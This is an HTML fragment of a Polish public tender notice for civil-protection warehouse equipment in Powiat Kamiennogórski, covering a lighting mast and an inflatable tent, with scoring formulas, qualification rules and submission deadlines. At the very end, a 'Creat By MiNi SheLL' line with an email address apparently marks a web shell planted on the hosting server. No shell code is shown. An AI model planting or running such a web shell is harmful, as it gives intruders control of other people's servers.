oznacza liczbę dni skrócenia terminu zaoferowanego przez Wykonawcę<br/>STmax – 7 (maksymalna ilość dni skrócenia)<br/>KT – liczbę punktów przyznanych badanej ofercie w Kryterium 2: Skrócenie terminu wykonania zamówienia <br/><br/>Wykonawca deklaruje, o jaki okres skróci termin wykonania w Formularzu oferty. <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/><br/>W przypadku gdy Wykonawca zadeklaruje skrócenie terminu wykonania zamówienia o więcej niż 7 dni kalendarzowych w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje skrócenie terminu wykonania zamówienia o 7 dni kalendarzowych. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby dni skrócenia terminu wykonania zamówienia w ramach oceny ofert otrzyma 0 (zero) punktów.<br/><br/>3)	Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania (KR):<br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę maksymalnego okresu rękojmi wynoszącego 24 miesiące. Zamawiający oceniając rozszerzoną rękojmię na towar w czasie przechowywania, weźmie pod uwagę liczbę miesięcy deklarowanego okresu rozszerzenia rękojmi na towar w czasie przechowywania w stosunku do maksymalnego. Wykonawca może rozszerzyć okres rękojmi na towar w czasie przechowywania o pełną liczbę miesięcy od 1 do 12 miesięcy. W przypadku wskazania niepełnej liczby miesięcy, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/>Wykonawca deklaruje, okres rozszerzenie rękojmi na towar w czasie przechowywania w Formularzu oferty. <br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KG2 =(RTOB/RTmax)x 20 pkt<br/>	<br/>gdzie:<br/>RTOB – oznacza liczbę miesięcy rozszerzenia rękojmi na towar w czasie przechowywania zaoferowaną przez Wykonawcę<br/>RTmax – 12 (maksymalna ilość miesięcy rozszerzonej rękojmi)<br/>KG2 – liczbę punktów przyznanych badanej ofercie w Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>W przypadku gdy wykonawca zadeklaruje rozszerzenie rękojmi na towar w czasie przechowywania o więcej niż 12 miesięcy w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje rozszerzenie rękojmi na towar w czasie przechowywania o 12 miesięcy. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby miesięcy rozszerzonej rękojmi na towar w czasie przechowywania w ramach oceny ofert otrzyma 0 (zero) punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzona rękojmia na towar w czasie przechowywania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi: Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim - Cześć 3 – Dostawa mobilnego masztu oświetleniowego.<br/>Zamówienie finansowane w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określają:<br/>1)	opis przedmiotu zamówienia – Tom III SWZ,<br/>2)	projektowane postanowienia umowy – Tom II do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31500000-1 - Urządzenia oświetleniowe i lampy elektryczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze ofert będzie kierował się następującymi kryteriami:<br/>1)	Zasady oceny Kryterium 1: Cena oferty (KC):<br/>Zamawiający oceniając cenę oferty, weźmie pod uwagę cenę oferty wskazaną przez Wykonawcę w Formularzu oferty.<br/>Sposób oceny: <br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>Kc =(Kcn/Kco)x 60 pkt	<br/>gdzie:<br/>Kcn – oznacza najniższą zaproponowaną cenę,<br/>Kco – oznacza cenę zaproponowaną w ofercie badanej,<br/>Kc – liczbę punktów przyznanych badanej ofercie w Kryterium 1: Cena oferty <br/>Waga kryterium – 60%.<br/>Oferta w tym kryterium może otrzymać maksymalnie 60 pkt.<br/><br/>2)	Kryterium 2: Skrócony termin dostawy (KT):<br/><br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę przynajmniej maksymalnego terminu wykonania zamówienia, tj. 21 dni od dnia zawarcia umowy w sprawie zamówienia publicznego. Zama-wiający oceniając skrócenie terminu wykonania zamówienia, weźmie pod uwagę liczbę dni kalendarzo-wych deklarowanego przez Wykonawcę skrócenia terminu wykonania zamówienia w stosunku do mak-symalnego. Wykonawca może skrócić termin wykonania zamówienia o pełną liczbę dni od 4 do 7. W przypadku wskazania niepełnej liczby dni, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/><br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KT =(STOB/STmax)x 20 pkt<br/>gdzie:<br/>STOB – oznacza liczbę dni skrócenia terminu zaoferowanego przez Wykonawcę<br/>STmax – 7 (maksymalna ilość dni skrócenia)<br/>KT – liczbę punktów przyznanych badanej ofercie w Kryterium 2: Skrócenie terminu wykonania zamówienia <br/><br/>Wykonawca deklaruje, o jaki okres skróci termin wykonania w Formularzu oferty. <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/><br/>W przypadku gdy Wykonawca zadeklaruje skrócenie terminu wykonania zamówienia o więcej niż 7 dni kalendarzowych w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje skrócenie terminu wykonania zamówienia o 7 dni kalendarzowych. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby dni skrócenia terminu wykonania zamówienia w ramach oceny ofert otrzyma 0 (zero) punktów.<br/><br/>3)	Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania (KR):<br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę maksymalnego okresu rękojmi wynoszącego 24 miesiące. Zamawiający oceniając rozszerzoną rękojmię na towar w czasie przechowywania, weźmie pod uwagę liczbę miesięcy deklarowanego okresu rozszerzenia rękojmi na towar w czasie przechowywania w stosunku do maksymalnego. Wykonawca może rozszerzyć okres rękojmi na towar w czasie przechowywania o pełną liczbę miesięcy od 1 do 12 miesięcy. W przypadku wskazania niepełnej liczby miesięcy, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/>Wykonawca deklaruje, okres rozszerzenie rękojmi na towar w czasie przechowywania w Formularzu oferty. <br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KG2 =(RTOB/RTmax)x 20 pkt<br/>	<br/>gdzie:<br/>RTOB – oznacza liczbę miesięcy rozszerzenia rękojmi na towar w czasie przechowywania zaoferowaną przez Wykonawcę<br/>RTmax – 12 (maksymalna ilość miesięcy rozszerzonej rękojmi)<br/>KG2 – liczbę punktów przyznanych badanej ofercie w Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>W przypadku gdy wykonawca zadeklaruje rozszerzenie rękojmi na towar w czasie przechowywania o więcej niż 12 miesięcy w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje rozszerzenie rękojmi na towar w czasie przechowywania o 12 miesięcy. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby miesięcy rozszerzonej rękojmi na towar w czasie przechowywania w ramach oceny ofert otrzyma 0 (zero) punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzona rękojmia na towar w czasie przechowywania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi: Doposażenie bazy magazynowej na potrzeby ochrony ludności i obrony cywilnej w Powiecie Kamiennogórskim - Część 4 – Dostawa namiotu wielofunkcyjnego (pneumatycznego) wraz z wyposażeniem. <br/>Zamówienie finansowane w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026.<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określają:<br/>1)	opis przedmiotu zamówienia – Tom III SWZ,<br/>2)	projektowane postanowienia umowy – Tom II do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39522530-1 - Namioty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39522520-8 - Łóżka polowe</p> <p class="mb-0">39522540-4 - Śpiwory</p> <p class="mb-0">39112000-0 - Krzesła</p> <p class="mb-0">39717000-1 - Wentylatory i urządzenia klimatyzacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze ofert będzie kierował się następującymi kryteriami:<br/>1)	Zasady oceny Kryterium 1: Cena oferty (KC):<br/>Zamawiający oceniając cenę oferty, weźmie pod uwagę cenę oferty wskazaną przez Wykonawcę w Formularzu oferty.<br/>Sposób oceny: <br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>Kc =(Kcn/Kco)x 60 pkt	<br/>gdzie:<br/>Kcn – oznacza najniższą zaproponowaną cenę,<br/>Kco – oznacza cenę zaproponowaną w ofercie badanej,<br/>Kc – liczbę punktów przyznanych badanej ofercie w Kryterium 1: Cena oferty <br/>Waga kryterium – 60%.<br/>Oferta w tym kryterium może otrzymać maksymalnie 60 pkt.<br/><br/>2)	Kryterium 2: Skrócony termin dostawy (KT):<br/><br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę przynajmniej maksymalnego terminu wykonania zamówienia, tj. 21 dni od dnia zawarcia umowy w sprawie zamówienia publicznego. Zama-wiający oceniając skrócenie terminu wykonania zamówienia, weźmie pod uwagę liczbę dni kalendarzo-wych deklarowanego przez Wykonawcę skrócenia terminu wykonania zamówienia w stosunku do mak-symalnego. Wykonawca może skrócić termin wykonania zamówienia o pełną liczbę dni od 4 do 7. W przypadku wskazania niepełnej liczby dni, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/><br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KT =(STOB/STmax)x 20 pkt<br/>gdzie:<br/>STOB – oznacza liczbę dni skrócenia terminu zaoferowanego przez Wykonawcę<br/>STmax – 7 (maksymalna ilość dni skrócenia)<br/>KT – liczbę punktów przyznanych badanej ofercie w Kryterium 2: Skrócenie terminu wykonania zamówienia <br/><br/>Wykonawca deklaruje, o jaki okres skróci termin wykonania w Formularzu oferty. <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/><br/>W przypadku gdy Wykonawca zadeklaruje skrócenie terminu wykonania zamówienia o więcej niż 7 dni kalendarzowych w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje skrócenie terminu wykonania zamówienia o 7 dni kalendarzowych. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby dni skrócenia terminu wykonania zamówienia w ramach oceny ofert otrzyma 0 (zero) punktów.<br/>3)	Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania (KR):<br/>Złożenie oferty jest jednoznaczne z przyjęciem przez Wykonawcę maksymalnego okresu rękojmi wynoszącego 24 miesiące. Zamawiający oceniając rozszerzoną rękojmię na towar w czasie przechowywania, weźmie pod uwagę liczbę miesięcy deklarowanego okresu rozszerzenia rękojmi na towar w czasie przechowywania w stosunku do maksymalnego. Wykonawca może rozszerzyć okres rękojmi na towar w czasie przechowywania o pełną liczbę miesięcy od 1 do 12 miesięcy. W przypadku wskazania niepełnej liczby miesięcy, np. 1,5 w celu oceny ofert Zamawiający dokona zaokrąglenia do liczby pełnej w dół – z „1,5 – 1”.<br/>Wykonawca deklaruje, okres rozszerzenie rękojmi na towar w czasie przechowywania w Formularzu oferty. <br/>Sposób oceny:<br/>Punkty zostaną przyznane według następującego wzoru:<br/><br/>KG2 =(RTOB/RTmax)x 20 pkt<br/>	<br/>gdzie:<br/>RTOB – oznacza liczbę miesięcy rozszerzenia rękojmi na towar w czasie przechowywania zaoferowaną przez Wykonawcę<br/>RTmax – 12 (maksymalna ilość miesięcy rozszerzonej rękojmi)<br/>KG2 – liczbę punktów przyznanych badanej ofercie w Kryterium 3: Rozszerzona rękojmia na towar w czasie przechowywania <br/><br/>Waga kryterium – 20%.<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>W przypadku gdy wykonawca zadeklaruje rozszerzenie rękojmi na towar w czasie przechowywania o więcej niż 12 miesięcy w celu oceny ofert Zamawiający przyjmie, że Wykonawca deklaruje rozszerzenie rękojmi na towar w czasie przechowywania o 12 miesięcy. <br/>W przypadku gdy Wykonawca w Formularzu oferty nie wskaże liczby miesięcy rozszerzonej rękojmi na towar w czasie przechowywania w ramach oceny ofert otrzyma 0 (zero) punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzona rękojmia na towar w czasie przechowywania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Karta katalogowa lub inny dokument potwierdzający, że oferowane dostawy spełniają wymagania Zamawiającego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Karta katalogowa lub inny dokument potwierdzający, że oferowane dostawy spełniają wymagania Zamawiającego. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie Wykonawcy, że nie podlega wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>2. Pełnomocnictwo.<br/>3. Zastrzeżenie tajemnicy przedsiębiorstwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku:<br/>1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego,<br/>2)	wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Oświadczenie składają odrębnie Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy z postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określa Tom II. Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sp_kamiennagora</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-13 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com